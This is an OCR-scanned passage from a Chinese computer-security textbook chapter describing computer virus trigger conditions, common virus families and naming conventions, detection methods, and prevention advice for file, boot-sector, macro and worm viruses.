和 表现 活动 的 触发 条 件 可 以 是 多 种 多 样 的 。 

首先 ， 触 发 条 件 可 以 是 单个 条 件 或 复合 条 件 。 
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图 4-2 计算 机 病毒 工作 流程 示意 图 
1. 单条 件 触 发 


仅仅 需要 一 个 条 件 即 可 触发 的 病毒 活动 是 单条 件 触 发 。 如 : 萨 达 姆 病毒 。 每 当中 断 向 
量 INT 21H 调用 8 次 时 ， 病 毒 的 表现 部 分 即 被 显示 。 


2. 复合 条 件 触发 


若干 个 条 件 经 过 逻辑 组 合 后 的 条 件 称 为 复合 条 件 。 如 : “黑色 星期 五 ”病毒 的 触发 条 
件 是 某 月 13 日 ， 并 且 又 是 星期 五 。 因 而 黑色 星期 五 病毒 是 复合 条 件 触发 的 ， 即 两 个 条 件 的 
逻辑 “与 ”(*。AND 。)。 

再 者 , 计算 机 病毒 的 触发 条 件 一 般 有 时 间 触 发 条 件 、 功 能 触发 条 件 、 宿 主 触发 条 件 等 。 

1) ”时 间 触 发 条 件 

以 特定 的 时 间 进 行 触发 的 条 件 。 计 算 机 病毒 以 系统 日 期 ( 某 年 某 月 某 日 ) 或 系统 时 间 ( 某 
时 某 分 某 秒 ) 为 触发 条 件 ， 或 作为 触发 的 复合 条 件 中 的 一 个 单条 件 。 

2) ”功能 触发 条 件 

以 计算 机 所 提供 的 功能 作为 触发 条 件 。 这 些 计算 机 功能 包括 系统 的 软 、 硬 件 的 特定 功 
能 实现 ， 以 及 计算 机 的 一 些 指令 、 命 令 的 执行 等 。 例 如 ， 一 条 COPY 命令 ， 某 个 中 断 向 量 
的 调用 ， 或 者 一 条 指令 ， 等 等 。 功 能 触发 条 件 也 可 与 时 间 触 发 条 件 或 其 他 功能 条 件 、 宿 主 
条 件 构成 复合 条 件 。 

3) ”宿主 触发 条 件 

许多 计算 机 病毒 ， 尤 其 是 传染 可 执行 文件 型 的 病毒 ， 对 于 正在 运行 或 当前 目录 下 的 程 
序 或 正在 引导 中 的 磁盘 是 有 选择 性 的 。 如 4 月 1 日 病毒 仅 传染 扩展 名 为 COM 的 可 执行 文 
件 ， 而 阿拉 梅 达 病 毒 只 传染 软磁盘 而 不 传染 硬 磁盘 。 

计算 机 病毒 一 般 只 传染 未 经 病毒 感染 过 的 软盘 和 可 执行 文件 。 因 此 ， 在 病毒 进行 传染 
前 一 定 会 校 验 被 选中 的 宿主 是 否 符合 未 曾 被 传染 过 这 个 条 件 。 
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4.2.4 常见 的 计算 机 病毒 


ID) “引导 型 、 病 毒 文 件 型 和 复合 型 病毒 

引导 型 病毒 有 大 麻 病毒 、2708 病毒 、 火 炬 病毒 、 小 球 病毒 、 美 丽 女孩 病毒 等 。 

文件 型 病毒 有 1575/1591 病毒 ，848 病毒 (感染 .COM 和 .EXE 等 可 执行 文件 )， 
Macro/Concept、Macro/Atoms 等 宏 病毒 (感染 .DOC 文件 )。 

复合 型 病毒 有 Flip 病毒 、 新 世纪 病毒 、One-half 病毒 等 。 

2) ”良性 病毒 和 恶性 病毒 

良性 病毒 有 小 球 病毒 、1575/1591 病毒 、 救 护 车 病毒 、 扬 基 病 毒 、Dabi 病毒 等 。 

恶性 病毒 有 黑色 星期 五 病毒 、 火 炬 病毒 、 米 开朗 琪 罗 病 毒 等 。 

病毒 类 型 的 识别 ， 最 简单 的 方法 就 是 从 病毒 的 名 称 上 看 ， 前 绥 表 示 该 病毒 发 作 的 操作 
平台 或 者 病毒 的 类 型 ，DOS 下 的 病毒 一 般 是 没有 前 绥 的 。 

病毒 名 为 该 病毒 的 名 称 及 其 家 族 ， 后 级 是 区 别 在 该 病毒 家 族 中 各 病毒 的 不 同 ， 用 字母 
或 用 数字 以 说 明 此 病毒 的 排序 和 大 小 。 

Trojan 表示 该 病毒 是 个 木马 ， 如 果 后 面 加 .a， 说 明 该 木马 的 第 一 个 变种 。 

WM 代表 Word 宏 病 毒 ; 

XM 代表 Excel 宏 病 毒 ; 

XF 代表 Excel 程式 (Excel Formula) 病 毒 ; 

Win 代表 感染 Windows 3.x 操作 系统 文件 的 病毒 ; 

W32 代表 感染 所 有 的 32 位 Windows 平台 的 病毒 ; 

WNT 代表 感染 32 位 Windows NT 操作 系统 的 病毒 ; 

HLLC 代表 高 级 语言 同伴 (High Level Language Companion) 病 毒 ; 

HLLP 代表 高 级 语言 寄生 (High Level Language Parasitic) 病 毒 ; 

HLLO 代表 高 级 语言 改写 (High Level Language Overwriting) 病 毒 ; 

Trojan/Troj 代表 特洛伊 木马 ; 

VBS 代表 着 用 Visual Basic Script 程序 语言 编写 的 病毒 ; 

PWSTEAL 代表 窍 取 密 码 等 信息 的 木马 ; 

JAVA 代表 用 Java 程序 语言 编写 的 病毒 。 


4.3 ”计算 机 病毒 的 检测 与 防范 


近年 来 , 计算 机 病毒 的 泛滥 ， 全 世界 平均 不 到 20 分 钟 就 会 产生 一 个 新 的 病毒 。 这些 病 
毒 通过 Intermet 传 向 世界 各 个 角落 ， 这 意味 着 连 入 Internet 的 计算 机 平均 20 分 钟 就 有 可 能 
被 感染 一 次 。 按 每 天 开机 联网 2 小 时 计算 , 一 年 内 可 能 被 全 世界 所 有 最 新 病毒 感染 2190 次 。 

据 统计 ， 在 我 国企 业 ， 公 司 级 的 网 络 系统 中 ， 有 90% 的 计算 机 都 曾 受到 过 病毒 的 感染 。 
60% 以 上 的 计算 机 都 曾 因 病毒 而 丢失 过 文件 、 数 据 等 。 计 算 机 病毒 的 侵犯 已 成 为 计算 机 安 
全 的 最 大 问题 ， 它 带 来 的 人 力 和 经 济 损失 是 巨大 的 。 

目前 ， 病 毒 在 设计 上 越 来 越 复杂 ， 在 数量 上 呈 指 数 增长 ， 并 在 功能 和 形态 等 方面 都 发 
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生 了 很 大 的 变化 ， 随 着 网 络 环境 的 普及 应 用 和 计算 机 软 硬 件 规模 的 增 大 ， 在 方便 人 们 使 用 
计算 机 的 同时 ， 也 扩展 了 病毒 的 传播 途径 ， 并 加 快 了 病毒 的 传播 速度 ， 而 且 加 大 了 检测 与 
防范 病毒 的 难度 。 因 此 需要 对 计算 机 病毒 进行 深入 的 研究 。 


4.3.1 计算 机 病毒 的 检测 方法 


磁盘 中 的 计算 机 病毒 可 分 成 引导 型 计算 机 病毒 和 文件 型 计算 机 病毒 。 对 这 两 种 病毒 的 
检测 原理 是 一 样 的 ， 但 由 于 它们 的 存储 方式 不 同 ， 检 测 方法 还 是 有 差别 的 。 

1. 比较 法 

比较 法 是 用 原始 备份 与 被 检测 的 引导 扇 区 或 被 检测 的 文件 进行 比较 。 比 较 时 不 需要 专 
用 的 检查 计算 机 病毒 的 程序 ， 只 要 用 常规 DOS 软件 和 PCTOOLS 等 工具 软件 就 可 以 进行 。 
而 且 比较 法 还 可 以 发 现 那些 尚 不 能 被 现 有 的 查 计算 机 病毒 的 程序 发 现 的 计算 机 病毒 。 由 于 
目前 还 没有 做 出 通用 的 能 查 出 一 切 计算 机 病毒 ， 或 通过 代码 分 析 ， 判 定 某 个 程序 中 是 否 含 
有 计算 机 病毒 的 查 毒 程序 ， 发 现 新 计算 机 病毒 就 只 有 用 比较 法 和 分 析 法 ， 有 时 必须 两 者 结 
合 来 共同 完成 。 

使 用 比较 法 能 发 现 异常 ， 如 文件 的 长 度 有 变化 ， 或 虽然 文件 长 度 未 发 生变 化 ， 而 文件 
内 的 程序 代码 发 生 了 变化 。 由 于 要 进行 比较 ， 保 留 好 原始 备份 是 非常 重要 的 ， 制 作 备 份 时 
必须 在 无 计算 机 病毒 的 环境 里 进行 ， 制 作 好 的 备份 必须 妥善 保管 。 

比较 法 的 好 处 是 简单 、 方 便 ， 不 需要 专用 软件 。 缺 点 是 无 法 确认 计算 机 病毒 的 种 类 名 
称 。 另外， 造成 被 检测 程序 与 原始 备份 之 间 差 别 的 原因 尚 需 进一步 验证 ， 以 查 明 是 由 于 计 
算 机 病毒 造成 的 , 或 是 由 于 DOS 数据 被 偶然 原因 ， 如 突然 停电 、 程 序 失控 、 恶 意 程序 等 破 
坏 的 。 另 外 ， 当 原始 备份 丢失 时 ， 比 较 法 就 不 起 作用 了 。 


2. 加 总 对 比 法 


根据 每 个 程序 的 档案 名 称 、 大 小 、 时 间 、 日 期 及 内 容 ， 加 总 为 一 个 检查 码 ， 再 将 检查 
码 附 于 程序 的 后 面 ， 或 是 将 所 有 检查 码 放 在 同一 个 数据 库 中 ， 再 利用 加 总 对 比 系统 ， 追 踪 
并 记录 每 个 程序 的 检查 码 是 否 遭 算 改 ， 以 判断 是 否 感染 了 计算 机 病毒 。 这 种 技术 可 侦 测 到 
各 式 的 计算 机 病毒 ， 但 最 大 的 缺点 是 误 判断 高 ， 且 无 法 确认 是 哪 种 计算 机 病毒 感染 的 ， 对 
于 隐形 计算 机 病毒 无 法 侦 测 到 。 


3. 搜索 法 


搜索 法 是 用 每 一 种 计算 机 病毒 体 含有 的 特定 字符 串 对 被 检测 的 对 象 进行 扫描 。 如 果 在 
被 检测 对 象 内 部 发 现 了 某 一 种 特定 字 节 串 ， 则 表明 该 字 节 串 包 含 计算 机 病毒 。 国 外 对 这 种 
按 搜索 法 工作 的 计算 机 病毒 扫描 软件 叫 Virus Scanner。 计算 机 病毒 扫描 软件 由 两 部 分 组 成 : 
一 部 分 是 计算 机 病毒 代码 库 ， 含 有 经 过 特别 选 定 的 各 种 计算 机 病毒 的 代码 串 ， 另 一 部 分 是 
利用 该 代码 库 进行 扫描 的 扫描 程序 。 目 前 常见 的 防 杀 计算 机 病毒 软件 对 已 知 计算 机 病毒 的 
检测 大 多 采用 这 种 方法 。 计 算 机 病毒 扫描 程序 能 识别 的 计算 机 病毒 的 数目 完全 取决 于 计算 
机 病毒 代码 库 内 所 含 计算 机 病毒 的 种 类 多 少 。 因 此 ， 病 毒 代 码 库 中 计算 机 病毒 代码 种 类 越 
多 , 扫描 程序 能 认 出 的 计算 机 病毒 就 越 多 。 计算 机 病毒 代码 串 的 恰当 选择 也 是 非常 重要 的 
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如 果 随意 从 计算 机 病毒 体内 选 一 段 作为 代表 该 计算 机 病毒 的 特征 代码 串 ， 那 么 在 不 同 的 环 
境 中 ， 该 代码 串 可 能 并 不 真正 具有 代表 性 ， 也 就 不 能 将 该 特征 代码 串 所 对 应 的 计算 机 病毒 
检查 出 来 。 

另 一 种 情况 是 代码 串 不 应 含有 计算 机 病毒 的 数据 区 ， 数 据 区 是 会 经 常 变化 的 。 特 征 代 
码 串 的 选 定 水 平 也 是 判别 一 个 计算 机 病毒 扫描 程序 好 坏 的 重要 依据 。 一 般 情况 下 ， 代 码 串 
是 由 连续 的 若干 个 字 节 组 成 的 串 ， 但 是 有 些 扫描 软件 采用 的 是 可 变 长 串 ， 即 在 串 中 包含 有 
一 个 到 几 个 “模糊 ” 字 节 。 扫 描 软 件 遇 到 这 种 串 时 ， 只 要 “模糊 ” 字 节 之 外 的 字 串 都 能 完 
好 匹配 ， 就 能 判别 出 计算 机 病毒 。 

这 种 扫描 法 的 缺点 也 是 明显 的 。 第 一 是 扫描 费时 ; 第 二 是 合适 的 特征 串 选择 难度 较 高 ; 
第 三 是 特征 库 要 不 断 升级 ， 第 四 是 怀 有 恶意 的 计算 机 病毒 制造 者 得 到 代码 库 后 ， 会 很 容易 
地 改变 计算 机 病毒 体内 的 代码 ， 生 成 一 个 新 的 变种 ， 使 扫描 程序 失去 检测 它 的 能 力 ， 第 五 
是 容易 产生 误 报 ， 只 要 在 正常 程序 内 带 有 某 种 计算 机 病毒 的 特征 串 ， 即 使 该 代码 段 已 不 可 
能 被 执行 ， 而 只 是 被 杀 死 的 计算 机 病毒 体 残 余 ， 扫 描 程序 仍 会 报警 ， 第 六 是 难以 识别 多 维 
变形 病毒 。 不 管 怎样 ， 基 于 特征 代码 串 的 计算 机 病毒 扫描 法 仍 是 今天 用 得 最 为 普遍 的 查 计 
算 机 病毒 方法 。 


4. 分 析 法 


此 种 方法 一 般 是 防 杀 计算 机 病毒 的 技术 人 员 使 用 。 使 用 分 析 法 的 目的 如 下 。 

(1) 确认 被 观察 的 磁盘 引导 扇 区 和 程序 中 是 否 含有 计算 机 病毒 。 

(2) 确认 计算 机 病毒 的 类 型 和 种 类 ， 判 定 其 是 否 是 一 种 新 的 计算 机 病毒 。 

G) 明确 计算 机 病毒 体 的 大 致 结构 ， 提 取 特 征 识别 用 的 字 节 串 或 特征 字 ， 用 于 增添 到 
计算 机 病毒 代码 库 供 病毒 扫描 和 识别 程序 用 。 

(4) 详细 分 析 计 算 机 病毒 代码 ， 为 制定 相应 的 防 杀 计 算 机 病毒 措施 制订 方案 。 

上 述 四 个 目的 按 顺 序 排列 起 来 ， 正 好 是 使 用 分 析 法 的 工作 顺序 。 使 用 分 析 法 要 求 具有 
比较 全 面 的 有 关 计 算 机 、 操 作 系统 和 网 络 等 的 结构 和 功能 调用 以 及 关于 计算 机 病毒 方面 的 
各 种 知识 。 

使 用 分 析 法 检测 计算 机 病毒 ， 除 了 要 具有 相关 的 知识 外 ， 还 需要 反 汇 编 工 具 、 二 进 制 
文件 编辑 器 等 分 析 用 工具 程序 和 专用 的 试验 计算 机 。 因 为 即使 是 很 熟练 的 防 杀 计算 机 病毒 
技术 人 员 ， 使 用 性 能 完善 的 分 析 软 件 ， 也 不 能 保证 在 短 时 间 内 将 计算 机 病毒 代码 完全 分 析 
清楚 。 而 计算 机 病毒 有 可 能 在 被 分 析 阶 段 继续 传染 甚至 发 作 ， 把 硬盘 内 的 数据 完全 毁坏 掉 ， 
这 就 要 求 分 析 工 作 必 须 在 专门 设立 的 试验 计算 机 机 上 进行 ， 不 怕 其 中 的 数据 被 破坏 。 在 不 
有 具备 条 件 的 情况 下 ， 不 要 轻易 开始 分 析 工作 ， 很 多 计算 机 病毒 都 采用 了 自 加 密 、 反 跟踪 等 
技术 ， 同 时 与 系统 的 牵扯 层次 很 深 ， 使 得 分 析 计算 机 病毒 的 工作 变 得 异常 艰辛 。 

计算 机 病毒 检测 的 分 析 法 是 防 杀 计算 机 病毒 工作 中 不 可 缺少 的 重要 技术 ， 任 何 一 个 性 
能 优良 的 防 杀 计算 机 病毒 系统 的 研制 和 开发 都 离 不 开 专 门人 员 对 各 种 计算 机 病毒 的 详尽 而 
认真 的 分 析 。 

分 析 的 步骤 分 为 静态 分 析 和 动态 分 析 两 种 。 静 态 分 析 是 指 利 用 反 汇 编 工具 将 计算 机 病 
毒 代码 打印 成 清单 后 进行 分 析 ， 看 计算 机 病毒 分 成 哪些 模块 ， 使 用 了 哪些 系统 调用 ， 采 用 
了 哪些 技巧 ,并 将 计算 机 病毒 感染 文件 的 过 程 翻转 为 清除 该 计算 机 病毒 、 修 复 文件 的 过 程 ; 
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判断 哪些 代码 可 被 用 作 特 征 码 以 及 如 何 防御 这 种 计算 机 病毒 。 分 析 人 员 具 有 的 素质 越 高 ， 
分 析 过 程 越 快 、 理 解 越 深 。 动态 分 析 则 是 指 利 用 DEBUG 等 调试 工具 在 内 存 带 毒 的 情况 下 ， 
对 计算 机 病毒 做 动态 跟踪 ， 观 察 计算 机 病毒 的 具体 工作 过 程 ， 以 进一步 在 静态 分 析 的 基础 
上 理解 计算 机 病毒 工作 的 原理 。 当 计算 机 病毒 采用 了 较 多 的 技术 手段 时 ， 必 须 使 用 动 、 静 
相 结合 的 分 析 方 法 才能 完成 整个 分 析 过 程 。 

5. 人 工 智 能 陷阱 技术 和 去 病毒 陷阱 技术 


人 工 智 能 陷阱 是 一 种 监测 计算 机 行为 的 常 驻 式 扫描 技术 。 它 将 所 有 计算 机 病毒 所 产生 
的 行为 归纳 起 来 ， 一 旦 发 现 内存 中 的 程序 有 任何 不 当 的 行为 ， 系 统 就 会 有 所 警觉 ， 并 告知 
使 用 者 。 这 种 技术 的 优点 是 执行 速度 快 、 操 作 简 便 ， 且 可 以 侦 测 到 各 式 计 算 机 病毒 ， 缺 点 
是 程序 设计 难 ， 且 不 容易 考虑 周全 。 但 是 ， 人 工 智能 陷阱 扫描 技术 是 一 个 具有 主动 保护 功 
能 的 新 技术 。 

宏 病 毒 陷阱 技术 (MacroTrap) 是 结合 了 搜索 法 和 人 工 智能 陷阱 技术 ， 依 行为 模式 来 侦 测 
已 知 及 未 知 的 宏 病毒 。 其 中 ， 配 合 OLE2 技术 ， 可 将 宏 与 文件 分 开 ， 使 得 扫描 速度 变 得 更 
快 ， 并 可 有 效 地 将 宏 病 毒 彻底 清除 。 

6. 软件 仿真 扫描 法 

该 技术 专门 用 来 对 付 多 态 变 形 计 算 机 病毒 (Polymorphic/MutationVirus)。 多 态 变 形 计 算 
机 病毒 在 每 次 传染 时 ， 都 将 自身 以 不 同 的 随机 数 加 密 于 每 个 感染 的 文件 中 ， 传 统 搜索 法 对 
这 种 计算 机 病毒 无 能 为 力 。 而 软件 仿真 技术 则 可 成 功 地 仿真 CPU 执行 ,在 DOS 虚拟 机 
(Virtual Machine) 下 伪 执 行 计算 机 病毒 程序 , 安全 并 确实 地 将 其 解密 , 使 其 显露 本 来 的 面目 ， 
再 加 以 扫描 。 


7. 先知 扫描 法 


先知 扫描 技术 (VICE, Virms Instruction Code Emulation) 是 继 软 件 仿 真 后 一 大 技术 上 的 突 
破 。 先 知 扫描 技术 将 专业 人 员 用 来 判断 程序 是 否 存 在 计算 机 病毒 代码 的 方法 ， 分 析 归 纳 成 
专家 系统 和 知识 库 ， 再 利用 软件 模拟 技术 (Software Emulation) 伪 执行 新 的 计算 机 病毒 ， 超 
前 分 析出 新 计算 机 病毒 代码 ， 对 付 以 后 的 计算 机 病毒 。 


4.3.2 ”常见 计算 机 病毒 的 防范 


1. 文件 型 计算 机 病毒 


文件 型 病毒 寄生 在 其 他 文件 中 ， 常 常 通过 对 它们 的 编码 加 密 或 使 用 其 他 技术 来 隐藏 自 
己 ， 它 动 夺 用 来 启动 主 程序 的 可 执行 命令 ， 用 作 它 自身 的 运行 命令 。 同 时 还 经 常 将 控制 权 
还 给 主 程序 ， 伪 装 计 算 机 系统 正常 运行 。 一 旦 运行 被 感染 了 病毒 的 程序 文件 ， 病 毒 便 被 激 
发 ， 执 行 大 量 的 操作 ， 并 进行 自我 复制 ， 同 时 附着 在 系统 其 他 可 执行 文件 上 伪装 自身 ， 并 
留 下 标记 ， 以 后 不 再 重复 感染 。 特 点 : 主要 感染 可 执行 文件 的 病毒 ， 它 通常 隐藏 在 宿主 程 
序 中 ， 执 行 宿主 程序 时 ， 将 会 先 执行 病毒 程序 再 执行 宿主 程序 。 传 播 方式 : 当 宿 主 程序 运 
行 时 ， 病 毒 程序 首先 运行 ， 然 后 驻 留 在 内 存 中 ， 再 伺机 感染 其 他 的 可 执行 程序 ， 达 到 传播 
的 目的 。 感 染 对 象 : 主要 是 扩展 名 是 COM 或 者 EXE 的 文件 。 病 毒 典型 代表 是 CIH 病毒 ， 
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别名 又 叫 Win95.CIH、Spacefiller、Win32.CIH、PE_CIH， 主 要 感染 早期 的 Windows 95/98 
系统 下 的 可 执行 文件 ， 在 Win NT 中 无 效 ， 目 前 在 主流 杀毒 软件 的 绞 杀 下 ， 已 经 绝迹 。 其 
发 展 过 程 经 历 了 v1.0，v1.1、v1.2、v1.3、v1.4 总 共 5 个 版 本 ， 和 危害 最 大 的 是 v1.2 版 本 ， 此 
版 本 只 在 每 年 的 4 月 26 日 发 作 ， 又 称 为 切 尔 诺 贝 利 病毒 (苏联 核 事 故 纪念 日 )。CIH 病毒 发 
作 时 ， 硬 盘 数据 、 硬 盘 主 引导 记录 、 系 统 引 导 扇 区 、 文 件 分 配 表 被 覆盖 ， 造 成 硬盘 数据 特 
别 是 C 盘 数 据 丢 失 ， 并 破坏 部 分 类 型 的 主板 上 的 Flash BIOS 导致 计算 机 无 法 使 用 ， 是 一 种 
既 破 坏 软件 又 破坏 硬件 的 恶性 病毒 。 

对 于 文件 型 计算 机 病毒 的 防范 ， 一 般 采 用 以 下 方法 。 

(1) 安装 最 新 版 本 的 、 功 能 强大 的 防 杀 计算 机 病毒 软件 ， 如 瑞星 、 卡 巴 斯 基 等 。 

(2) 及 时 更 新 查 杀 计算 机 病毒 引擎 ， 特 别 是 发 生计 算 机 病毒 突 发 事件 时 要 立即 更 新 。 

(3) 经 常 使 用 防 杀 计算 机 病毒 软件 对 系统 进行 计算 机 病毒 检查 。 

(4) 对 关键 文件 ， 如 系统 文件 、 保 密 的 数据 等 ， 在 没有 计算 机 病毒 的 环境 下 经 常 
备份 。 

(5) 在 不 影响 系统 正常 工作 的 情况 下 对 系统 文件 设置 最 低 的 访问 权限 ， 以 防止 计算 机 
病毒 的 侵害 。 

(6) 当 使 用 Windows 操作 系统 时 ， 修 改 文件 夹 窗 口中 的 默认 属性 。 具 体操 作为 双击 鼠 
标 左 键 打开 “我 的 电脑 ”， 选 择 “ 查 看 ”菜单 中 的 “选项 ”命令 。 然 后 在 “查看 ”中 选择 
“显示 所 有 文件 ”选项 ， 取 消 “ 隐 藏 已 知 文件 类 型 的 文件 扩展 名 ”选项 的 色 选 ， 单 击 “ 确 
定 ”按钮 。 注 意 不 同 的 操作 系统 平台 可 能 显示 的 文字 有 所 不 同 。 


2. 引导 型 计算 机 病毒 


引导 型 病毒 寄生 在 主 引导 区 、 引 导 区 ， 病 毒 利 用 操作 系统 的 引导 模块 放 在 某 个 固定 的 
位 置 ， 并 且 控制 权 的 转交 方式 是 以 物理 位 置 为 依据 ， 而 不 是 以 操作 系统 引导 区 的 内 容 为 依 
据 ， 因 而 病毒 占据 该 物理 位 置 即 可 获得 控制 权 ， 而 将 真正 的 引导 区 内 容 强制 转移 ， 待 病毒 
程序 执行 后 ， 将 控制 权 交 给 真正 的 引导 区 内 容 ， 使 得 这 个 带 病毒 的 系统 看 似 正常 运转 ， 而 
病毒 已 隐藏 在 系统 中 并 伺机 传染 、 发 作 。 主 引导 记录 病毒 感染 硬盘 的 主 引 导 区 ， 如 大 麻 病 
毒 、2708 病毒 、 火 炬 病毒 等 ， 分 区 引导 记录 病毒 感染 硬盘 的 活动 分 区 引导 记录 ， 如 小 球 病 
毒 、 美 丽 女 孩 病 毒 等 。 

引导 型 病毒 进入 系统 ， 一 定 要 通过 启动 过 程 ， 在 无 病毒 环境 下 使 用 的 UU 盘 或 硬盘 ， 即 
使 它 已 感染 引导 区 病毒 ， 也 不 会 进入 系统 并 进行 传染 ， 但 是 ， 只 要 用 感染 引导 区 病毒 的 磁 
盘 引 导 系统 ， 就 会 使 病毒 程序 进入 内 存 ， 形 成 病毒 环境 。 

另外 ， 病 毒 的 一 部 分 仍 驻 留 在 内 存 中 ， 当 新 的 TU 盘 插入 时 ， 病 毒 就 会 把 自己 写 到 新 的 
磁盘 上 。 当 这 个 盘 被 用 于 另 一 台 机 器 时 ， 病 毒 就 会 以 同样 的 方法 传播 到 那 台 机 器 的 引导 扇 
区 上 。 

预防 引导 型 计算 机 病毒 ， 通 常 采用 以 下 方法 。 

(1) 坚持 从 硬盘 引导 系统 。 

(2) 安装 能 够 实时 监控 引导 扇 区 的 防 杀 计 算 机 病毒 软件 ， 或 经 常用 能 够 查 杀 引导 型 计 
算 机 病毒 的 防 杀 计算 机 病毒 软件 进行 检查 。 

(3) 经 常备 份 系统 引导 扇 区 。 
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(4) 有 效 利用 主板 上 提供 引导 扇 区 计算 机 病毒 保护 功能 (Virus Protect)。 
3. 宏 病 毒 


宏 病 毒 是 一 种 寄存 在 文档 或 模板 的 宏 中 的 计算 机 病毒 。 一 旦 打开 这 样 的 文档 ， 其 中 的 
宏 就 会 被 执行 ， 于 是 宏 病 毒 就 会 被 激活 ， 转 移 到 计算 机 上 ， 并 驻 留 在 Normal 模板 上 。 从 此 
以 后 ， 所 有 自动 保存 的 文档 都 会 “感染 ”上 这 种 宏 病 毒 ， 而 且 如 果 其 他 用 户 打 开 了 感染 病 
毒 的 文档 ， 宏 病毒 又 会 转移 到 他 的 计算 机 上 。 

如 果 并 不 希望 在 文档 中 包含 宏 ， 或 者 不 了 解 文 档 的 确切 来 源 ， 例 如 ， 文 档 是 作为 电子 
邮件 的 附件 收 到 的 ， 或 是 来 自 网 络 ， 在 这 种 情况 下 ， 为 了 防止 可 能 发 生 的 病毒 传染 ， 打 开 
文档 过 程 中 出 现 宏 警告 提示 时 最 好 选择 “取消 宏 ”。 

1) ” 宏 病 毒 的 判断 方法 

虽然 不 是 所 有 包含 宏 的 文档 都 包含 了 宏 病 毒 ， 但 当 有 下 列 情况 之 一 时 ， 可 以 百分之百 
地 断定 你 的 Office 文档 或 Office 系统 中 有 宏 病毒 。 

(1) 在 打开 “ 宏 病毒 防护 功能 ”的 情况 下 ， 当 打开 一 个 文档 时 ， 系 统 会 弹出 相应 的 警 
告 框 。 而 并 没有 在 其 中 使 用 宏 或 并 不 知道 宏 到 底 怎么 用 ， 那 么 可 以 完全 肯定 这 个 文档 已 经 
感染 了 宏 病 毒 。 

(2) 同样 情况 下 ，Office 文档 中 一 系列 的 文件 在 打开 时 都 给 出 宏和 警告 。 可 以 肯定 这 些 
文档 中 有 宏 病 毒 。 

(3) 如 果 软 件 中 关于 宏 病 毒 防护 选项 启用 后 ， 一 旦 发 现 你 的 机 器 中 设置 的 宏 病 毒 防护 
功能 选项 无 法 在 两 次 启动 Word 之 间 保 持 有 效 ， 则 系统 一 定 已 经 感染 了 宏 病 毒 。 也 就 是 说 
一 系列 Word 模板 、 特 别 是 normal.dot 已 经 被 感染 。 

总 之 ， 鉴 于 绝 大 多 数 人 都 不 需要 或 者 不 会 使 用 “ 宏 ” 这 个 功能 ， 我 们 可 以 得 出 一 个 相 
当 重 要 的 结论 : 如 果 Office 文档 在 打开 时 ， 系 统 给 出 一 个 宏 病毒 警告 框 ， 那 么 应 该 对 这 个 
文档 保持 高 度 警惕 ， 它 已 被 感染 的 概率 极 大 。 注 意 : 简单 地 删除 被 宏 病毒 感染 的 文档 并 不 
能 清除 Office 系统 中 的 宏 病毒 ! 

2) ” 宏 病 毒 的 防治 和 清除 

(1) 用 最 新 版 的 反 病 毒 软件 清除 宏 病 毒 。 

使 用 反 病 毒 软件 是 一 种 高 效 、 安 全 和 方便 的 清除 方法 ， 也 是 一 般 计算 机 用 户 的 首选 
方法 。 

因此 ， 对 付 宏 病 毒 应 该 和 对 付 其 他 种 类 的 病毒 一 样 ， 也 要 尽量 使 用 最 新 版 的 查 杀 病毒 
软件 。 无 论 你 使 用 的 是 哪 种 杀毒 软件 ， 及 时 升级 是 非常 重要 的 。 

(2) 用 写字 板 或 Word 6.0 以 上 的 版 本 文档 作为 清除 宏 病 毒 的 桥梁 。 

如 果 Word 系统 没有 感染 宏 病 毒 ， 但 需要 打开 某 个 外 来 的 ， 已 查 出 感染 有 宏 病 毒 的 文 
档 ， 而 手头 现 有 的 反 病毒 软件 又 无 法 查 杀 它们 ， 那 么 可 以 试验 用 下 面 的 方法 来 查 杀 文档 中 
的 宏 病 毒 ， 打 开 这 个 包含 了 宏 病 毒 的 文档 (当然 是 启用 Word 中 的 “ 宏 病 毒 防护 ”功能 ， 并 
在 宏 警告 出 现时 选择 “取消 宏 ”)， 然 后 在 “文件 ”菜单 中 选择 “另存 为 ”命令 ， 将 此 文档 
改 存 成 写字 板 (RTF) 格 式 或 Word#6.0 格式 。 存 盘 后 应 该 检查 一 下 文档 的 完整 性 ， 如 果 文 档 
内 容 没有 任何 丢失 ， 并 且 在 重新 打开 此 文档 时 不 再 出 现 宏 警 告 则 大 功 告 成 。 
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4. 蠕虫 病毒 

蠕虫 病毒 是 一 种 常见 的 计算 机 病毒 。 它 是 利用 网 络 进行 复制 和 传播 的 ， 传 染 途 径 是 通 
过 网 络 和 电子 邮件 。 最 初 的 蠕虫 病毒 定义 是 因为 在 DOS 环境 下 , 病毒 发 作 时 会 在 屏幕 上 出 
现 一 条 类 似 虫子 的 东西 ， 胡 乱 吞 吃 屏 幕 上 的 字母 并 将 其 改 形 。 

蠕虫 病毒 有 时 也 叫 “ 野 免 ”， 它 一 般 是 通过 1434 端口 漏洞 传播 。“ 尼 姆 亚 ” 病 毒 、“ 熊 
猫 烧香 ”以 及 其 变种 也 是 蠕虫 病毒 ， 这 一 病毒 是 利用 了 微软 视窗 操作 系统 的 漏洞 。 计 算 机 
感染 这 一 病毒 后 , 会 不 断 自动 拨号 上 网 ， 并 利用 文件 中 的 地 址 信息 或 者 网 络 共享 进行 传播 ， 
最 终 破坏 用 户 的 大 部 分 重要 数据 。 

蠕虫 病毒 的 一 般 防 治 方法 是 : 使 用 具有 实时 监控 功能 的 杀毒 软件 ， 并 且 注 意 不 要 轻易 
打开 不 熟悉 的 邮件 附件 。 

蠕虫 和 普通 病毒 不 同 的 一 个 特征 是 蠕虫 病毒 往往 能 够 利用 漏洞 ， 这 里 的 漏洞 或 者 说 是 
缺陷 ， 可 以 分 为 两 种 ， 即 软件 上 的 缺陷 和 人 为 的 缺陷 。 人 为 的 缺陷 ， 主 要 指 的 是 计算 机 用 
户 的 疏忽 。 这 就 是 所 谓 的 社会 工程 学 (social engineering)， 当 收 到 一 封 带 着 病毒 的 求职 信 邮 
件 时 ， 大 多 数 人 都 会 抱 着 好 奇 去 点 击 的 。 对 于 企业 用 户 来 说 ， 威 胁 主要 集中 在 服务 器 和 大 
型 应 用 软件 的 安全 上 ， 而 对 个 人 用 户 而 言 ， 主 要 是 防范 第 二 种 缺陷 。 

个 人 用 户 对 蠕虫 病毒 的 防范 措施 有 以 下 几 点 。 

(1) 选 购 合适 的 杀毒 软件 。 

(2) 经 常 升级 病毒 库 。 蠕 虫 病毒 的 传播 速度 快 、 变 种 多 ， 所 以 必须 随时 更 新 病毒 库 ， 
以 便 能 够 查 杀 最 新 的 病毒 。 

(G3) 提高 防 杀毒 意识 。 不 要 轻易 去 点 击 陌生 的 站 点 ， 有 可 能 里 面 就 含有 恶意 代码 ! 

